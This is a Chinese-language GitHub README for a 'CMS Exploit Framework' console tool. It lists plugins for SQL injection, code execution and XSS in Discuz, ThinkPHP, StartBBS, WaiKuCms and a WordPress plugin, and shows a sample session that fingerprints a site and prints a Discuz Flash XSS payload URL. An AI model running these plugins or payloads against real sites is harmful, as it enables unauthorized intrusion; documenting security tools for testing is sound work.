Skip to content

Q2h1Cg/CMS-Exploit-Framework

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

53 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CMS Exploit Framework

简介

CMS Exploit Framework 是一款 CMS 漏洞利用框架,通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。

安装

本框架采用 Python 语言开发,并且第三方依赖包都已打包,所以您所需要做的只是下载、启动。

chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.git
Cloning into 'CMS-Exploit-Framework'...
remote: Counting objects: 352, done.
remote: Compressing objects: 100% (182/182), done.
remote: Total 352 (delta 159), reused 347 (delta 154)
Receiving objects: 100% (352/352), 463.62 KiB | 16.00 KiB/s, done.
Resolving deltas: 100% (159/159), done.
Checking connectivity... done.
chu@sh3ll-me:/tmp » cd CMS-Exploit-Framework
chu@sh3ll-me:/tmp/CMS-Exploit-Framework » python console.py

 _______________________
< CMS Exploit Framework >
 -----------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

+ -- --=[ CMS Exploit Framework - 2014/10/10 ]
+ -- --=[ 6 CMS                              ]
+ -- --=[ 11 Plugins                         ]

CMS Exploit Framework >

使用

框架内输入 help 可查看详细的帮助信息,一般来讲,基本的使用步骤如下:

chu@sh3ll-me:/tmp/CMS-Exploit-Framework » python console.py

 _______________________
< CMS Exploit Framework >
 -----------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

+ -- --=[ CMS Exploit Framework - 2014/10/10 ]
+ -- --=[ 6 CMS                              ]
+ -- --=[ 11 Plugins                         ]

CMS Exploit Framework > help

Core Commands
=============

Command                       Description
-------                       -----------
help                          Help menu
use <plugin>                  Select a plugin by name
vulns                         List all vulnerabilities in the database
update                        Update the framework
vulns -d                      Clear all vulnerabilities in the database
exploit                       Run current plugin
vulns -o <plugin>             Save vulnerabilities to file
search <keyword>              Search plugin names and descriptions
set <option> <value>          Set a variable to a value
rebuild_db                    Rebuild the database
info <plugin>                 Display information about one plugin
list                          List all plugins
version                       Show the framework version numbers
exit                          Exit the console
options                       Display options for current plugin

CMS Exploit Framework > list

Plugins
=======

Name                                    Scope                                   Description
----                                    -----                                   -----------
discuz_faq_gids_sqli                    Discuz 7.1-7.2                          /faq.php 参数 gids 未初始化 导致 SQL 注入
discuz_flvplayer_flash_xss              Discuz! x3.0                            /static/image/common/flvplayer.swf Flash XSS
multi_autopwn                           All CMS                                 漏洞批量利用模块
multi_demo                              Demo                                    Plugin Demo
multi_whatweb                           All CMS                                 CMS 识别
startbbs_search_q_sqli                  StartBBS 1.1.5.2                      /themes/default/search.php 参数 q 未过滤导致 SQL 注入
startbbs_swfupload_flash_xss            StartBBS -1.1.5.3                       StartBBS swfupload.swf Flash XSS
thinkphp_dispatcher_code_exec           ThinkPHP 2.1,2.2,3.0                    Dispatcher.class.php 代码执行
thinkphp_lite_code_exec                 ThinkPHP 3.0,3.1.2,3.1.3                ThinkPHP 以 lite 模式启动时存在代码执行漏洞
waikucms_search_code_exec               WaiKuCms 2.0/20130612                   Search.html 参数 keyword 代码执行
wordpress_all_in_one_seo_pack_xss       All in One SEO Pack 1.3.6.4 - 2.0.3     WordPress All in One SEO Pack 插件低版本反射型 XSS

CMS Exploit Framework > info multi_whatweb

           Name: multi_whatweb
            CMS: multi
          Scope: All CMS

Author:
	Chu <root@sh3ll.me>

Description:
	CMS 识别

Reference:
	http://sh3ll.me/

CMS Exploit Framework > use multi_whatweb
CMS Exploit Framework > multi_whatweb > options

	Name                Current Setting                         Required  Description
	----                ---------------                         --------  -----------
	URL                                                         True      网站地址
	Thread              10                                      True      线程数

CMS Exploit Framework > multi_whatweb > set URL http://xxoo.com
URL => http://xxoo.com
CMS Exploit Framework > multi_whatweb > exploit
[+]http://xxoo.com: discuz
CMS Exploit Framework > multi_whatweb > search discuz

Matching Plugins
================

Name                                    Scope                                   Description
----                                    -------                                 -----------
discuz_faq_gids_sqli                    Discuz 7.1-7.2                          /faq.php 参数 gids 未初始化 导致 SQL 注入
discuz_flvplayer_flash_xss              Discuz! x3.0                            /static/image/common/flvplayer.swf Flash XSS

CMS Exploit Framework > multi_whatweb > info discuz_flvplayer_flash_xss

           Name: discuz_flvplayer_flash_xss
            CMS: discuz
          Scope: Discuz! x3.0

Author:
	Chu <root@sh3ll.me>

Description:
	/static/image/common/flvplayer.swf Flash XSS

Reference:
	http://www.ipuman.com/pm6/138/

CMS Exploit Framework > multi_whatweb > use discuz_flvplayer_flash_xss
CMS Exploit Framework > discuz_flvplayer_flash_xss > options

	Name                Current Setting                         Required  Description
	----                ---------------                         --------  -----------
	URL                                                         True      网站地址

CMS Exploit Framework > discuz_flvplayer_flash_xss > set URL http://xxoo.com
URL => http://xxoo.com
CMS Exploit Framework > discuz_flvplayer_flash_xss > exploit
[*]Requesting target site
[+]Exploitable!
[+]http://xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
CMS Exploit Framework > discuz_flvplayer_flash_xss > vulns

Vulns
=====

Plugin                                  Vuln
------                                  ----
multi_whatweb                           http://xxoo.com: discuz
discuz_flvplayer_flash_xss              http://xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);

CMS Exploit Framework > discuz_flvplayer_flash_xss >

详细的使用说明请见项目 Wiki。

插件开发

框架托管于 Github,插件开发请参考 /plugins/multi/demo.py,然后 pull request。

详细的开发文档请见项目 Wiki。

作者

About

CMS Exploit Framework

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages